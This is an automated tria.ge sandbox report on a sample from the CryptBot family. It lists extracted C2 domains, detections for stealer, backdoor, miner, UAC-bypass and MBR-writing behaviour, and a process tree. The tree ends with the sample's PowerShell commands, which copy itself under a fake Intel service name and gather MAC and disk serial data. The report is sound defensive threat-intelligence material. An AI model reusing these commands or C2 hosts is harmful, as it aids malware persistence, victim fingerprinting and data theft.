Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    686s
  • max time network
    686s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 02:55

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Family

cryptbot

C2

nkoopw11.top

moraass08.top

Signatures

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • CryptBot payload 3 IoCs
  • Cryptbot family
  • Detection for the Linux version of Sysjoker cross-platform backdoor 1 IoCs
  • Detection for the macOS version of Sysjoker cross-platform backdoor 1 IoCs
  • Detection for the windows version of Sysjoker cross-platform backdoor 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 2 IoCs
  • SysJoker

    SysJoker is a cross-platform backdoor first seen in late 2021.

  • Sysjoker family
  • UAC bypass 3 TTPs 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 16 IoCs
  • Manipulates Digital Signatures 1 TTPs 3 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Checks computer location settings 2 TTPs 25 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 52 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Deobfuscate/Decode Files or Information 1 TTPs 4 IoCs

    Payload decoded via CertUtil.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 29 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Pyran1/MalwareDatabase
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdadb246f8,0x7ffdadb24708,0x7ffdadb24718
      2⤵
        PID:4164
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2300 /prefetch:2
        2⤵
          PID:1548
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2992
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
          2⤵
            PID:4592
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
            2⤵
              PID:4988
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
              2⤵
                PID:2832
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:8
                2⤵
                  PID:4032
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3372
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
                  2⤵
                    PID:4192
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
                    2⤵
                      PID:4444
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                      2⤵
                        PID:1740
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5368 /prefetch:8
                        2⤵
                          PID:2148
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
                          2⤵
                            PID:4652
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2332
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                            2⤵
                              PID:4072
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
                              2⤵
                                PID:3444
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
                                2⤵
                                  PID:5640
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
                                  2⤵
                                    PID:5864
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5884
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
                                    2⤵
                                      PID:5224
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                                      2⤵
                                        PID:5456
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 /prefetch:8
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2180
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1264 /prefetch:2
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:752
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
                                        2⤵
                                          PID:5520
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1704 /prefetch:1
                                          2⤵
                                            PID:4860
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2152
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
                                            2⤵
                                              PID:5376
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
                                              2⤵
                                                PID:4848
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3088 /prefetch:8
                                                2⤵
                                                  PID:3432
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
                                                  2⤵
                                                    PID:5952
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:8
                                                    2⤵
                                                      PID:5960
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                                                      2⤵
                                                        PID:5728
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                                                        2⤵
                                                          PID:5712
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 /prefetch:8
                                                          2⤵
                                                            PID:2296
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
                                                            2⤵
                                                              PID:264
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:8
                                                              2⤵
                                                                PID:1556
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                                                2⤵
                                                                  PID:4848
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
                                                                  2⤵
                                                                    PID:2000
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
                                                                    2⤵
                                                                      PID:4052
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:1
                                                                      2⤵
                                                                        PID:3284
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
                                                                        2⤵
                                                                          PID:1668
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 /prefetch:8
                                                                          2⤵
                                                                            PID:4924
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
                                                                            2⤵
                                                                              PID:5440
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
                                                                              2⤵
                                                                                PID:2148
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 /prefetch:8
                                                                                2⤵
                                                                                  PID:4432
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                                                                                  2⤵
                                                                                    PID:1476
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
                                                                                    2⤵
                                                                                      PID:4440
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2284,4581409775118267925,10968108884468117042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 /prefetch:8
                                                                                      2⤵
                                                                                        PID:3920
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:1772
                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                        1⤵
                                                                                          PID:1392
                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                          1⤵
                                                                                            PID:5404
                                                                                          • C:\Program Files\7-Zip\7zG.exe
                                                                                            "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2172:190:7zEvent14720
                                                                                            1⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:556
                                                                                          • C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe
                                                                                            "C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"
                                                                                            1⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5160
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                                                                              2⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5460
                                                                                            • C:\ProgramData\SystemData\igfxCUIService.exe
                                                                                              "C:\ProgramData\SystemData\igfxCUIService.exe"
                                                                                              2⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4016
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
